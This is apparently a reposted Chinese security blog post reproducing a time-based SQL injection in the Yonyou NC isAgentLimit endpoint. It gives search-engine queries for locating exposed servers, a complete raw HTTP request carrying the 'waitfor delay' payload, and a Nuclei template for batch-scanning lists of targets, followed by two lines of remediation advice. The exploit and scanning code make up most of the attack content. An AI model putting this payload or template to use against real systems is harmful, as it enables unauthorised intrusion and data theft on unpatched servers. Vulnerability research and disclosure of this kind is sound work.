用友NC isAgentLimit 接口 SQL注入漏洞

admin 2024年6月18日10:46:02评论36 views字数 1980阅读6分36秒阅读模式
0x00 免责声明
disclaimer

请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。信息及工具收集于互联网,真实性及安全性自测,如有侵权请联系删除。本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!!!未经授权,严禁转载,如需转载,联系小明信安公众号。

0x01 漏洞介绍
Vulnerability introduction
    用友NC/portal/pt/oacoSchedulerEvents/isAgentLimit接口存在SQL注入漏洞,攻击者可以通过漏洞获取服务器内敏感信息导致信息泄露,甚至通过漏洞写入木马病毒获取服务器权限。

0x02 搜索语法
Search for syntax
  • Fofa:
body="../Client/Uclient/UClient.dmg"
  • Hunter
body="../Client/Uclient/UClient.dmg"
  • Quake
body="../Client/Uclient/UClient.dmg"

用友NC isAgentLimit 接口 SQL注入漏洞

0x03 漏洞复现
Request packets
  • SQL延时注入,4s
GET /portal/pt/oacoSchedulerEvents/isAgentLimit?pageId=login&pk_flowagent=1'waitfor+delay+'0:0:4'-- HTTP/1.1
Host: your-ip
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
用友NC isAgentLimit 接口 SQL注入漏洞
  • 延时 2s
用友NC isAgentLimit 接口 SQL注入漏洞
0x04 nuclei POC
nuclei POC
  • Nuclei 批量检测POC
  • 所用方法nuclei.exe -l 网址文件.txt -t POC.yaml
id: Yonyou_NC_isAgentLimit_SQL_injected

info:
  name: Yonyou NC isAgentLimit SQL injected
  author: security-xm
  severity: high
  description: 用友NC /portal/pt/oacoSchedulerEvents/isAgentLimit接口存在SQL注入漏洞
  metadata:
    max-request: 1
    shodan-query: ""
    verified: true

http:
  - raw:
      - |+
        GET /portal/pt/oacoSchedulerEvents/isAgentLimit?pageId=login&pk_flowagent=1'waitfor+delay+'0:0:4'-- HTTP/1.1
        Host: {{Hostname}}
        Upgrade-Insecure-Requests: 1
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
        Accept-Encoding: gzip, deflate, br
        Accept-Language: zh-CN,zh;q=0.9
        Connection: close

    redirects: true
    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - 'duration >= 4'

用友NC isAgentLimit 接口 SQL注入漏洞
0x05 修复建议
Remediation recommendations
  • 在Web应用防火墙中添加接口临时黑名单规则
  • 联系厂商打补丁或升级版本。

 

原文始发于微信公众号(小明信安):【漏洞复现 | 含批量POC】用友NC isAgentLimit 接口 SQL注入漏洞

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年6月18日10:46:02
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   用友NC isAgentLimit 接口 SQL注入漏洞http://cn-sec.com/archives/2859632.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息